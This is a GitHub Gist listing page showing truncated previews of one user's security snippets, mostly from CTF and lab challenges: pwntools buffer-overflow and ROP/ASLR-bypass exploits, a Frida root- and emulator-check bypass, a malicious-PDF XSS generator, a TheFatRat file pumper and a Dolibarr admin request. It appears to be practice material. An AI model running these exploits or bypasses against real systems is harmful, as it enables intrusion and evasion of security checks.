@sharpicx
sharpicx / http.req
Created March 5, 2024 04:13
dolibarr - puffy
POST /erp/admin/security_file.php HTTP/1.1
Host: 10.1.2.120
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.1.2.120/erp/admin/security_file.php
Cookie: DOLSESSID_0720a1e225467ccab19d539968c64a66=a0jlgsjtio2d05b7ofvdcb6l73
DNT: 1
Connection: close
@sharpicx
sharpicx / exp.py
Last active March 1, 2024 07:48
ASLR leaked itself
from pwn import *
context(arch='amd64', os='linux', log_level='DEBUG')
e = ELF('./pubg')
p = e.process()
offset = 96
p.recvuntil(b"coordinate: ")
@sharpicx
sharpicx / exploit.py
Created February 27, 2024 05:35
off-by-one error | PETIR
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
e = ELF('./pwnme', checksec=True)
p = e.process()
offset = 268
p.sendline(("A" * offset) + "\xef\xbe\xad\xde")
p.interactive()
p.close()
@sharpicx
sharpicx / script.js
Last active February 26, 2024 16:29
chall v2 - my company
Java.perform(function () {
  var _class = Java.use("com.xxxxxx.xxxxxxxx.MainActivity");
  var _class2 = Java.use("b.b.a.a.a");
  var _isEmulator = _class.isEmulator;
  var _root = _class2.l;
  _isEmulator.implementation = function () {
    return false;
  };
  _root.implementation = function () {
    return false;
@sharpicx
sharpicx / bad_seed.c
Last active February 13, 2024 20:12
HackMyVM - Zeug
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main() {
    srand(1);
    int var_18h = rand();
    uint32_t var_14h = 0xdeadbeef;
    uint32_t total = var_14h ^ var_18h;
    printf("%d\n", total);
@sharpicx
sharpicx / exploit.py
Last active February 4, 2024 19:40
hackmyvm - minimal (x64 bypassing ASLR + ROP chain)
from pwn import *
context(log_level="DEBUG", os="linux", arch="amd64")
e = ELF("./shop")
p = process(e.path)
r = ROP(e)
libc = ELF("/usr/lib/libc.so.6")
offset = 120
padding = b"A" * offset
@sharpicx
sharpicx / crypto.js
Last active January 25, 2024 12:14
I got an email flooding attack, so I decided to build this script.
function Si(e) {
  return "0123456789abcdefghijklmnopqrstuvwxyz".charAt(e);
}
function Pi(e, t) {
  return e & t;
}
function Ei(e, t) {
  return e | t;
}
function Ni(e, t) {
@sharpicx
sharpicx / xss.py
Last active January 11, 2024 04:19
pdf to xss
import io
import bz2
import base64
import sys
if sys.version_info[0] < 3:
    raise SystemExit("Use Python 3 (or higher) only")
def create_malpdf1(filename):
    with open(filename, "w") as file:
@sharpicx
sharpicx / test.py
Created January 5, 2024 03:48
TheFatRat - File Pumper
import sys
#python fpump.py [file] [size] [-mb/-kb]
if len(sys.argv) < 4:
    sys.exit('[-] Missing argument!\n[+] Usage: python pumper.py [file] [size] [-mb/-kb]')
fp = sys.argv[1]
size = int(sys.argv[2])
tp = sys.argv[3]
@sharpicx
sharpicx / test.js
Last active January 3, 2024 12:03
Puffy - Hacktrace
var axios = require("axios");
var readline = require("readline");
var cheerio = require("cheerio");
const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout
});
function hex(data) {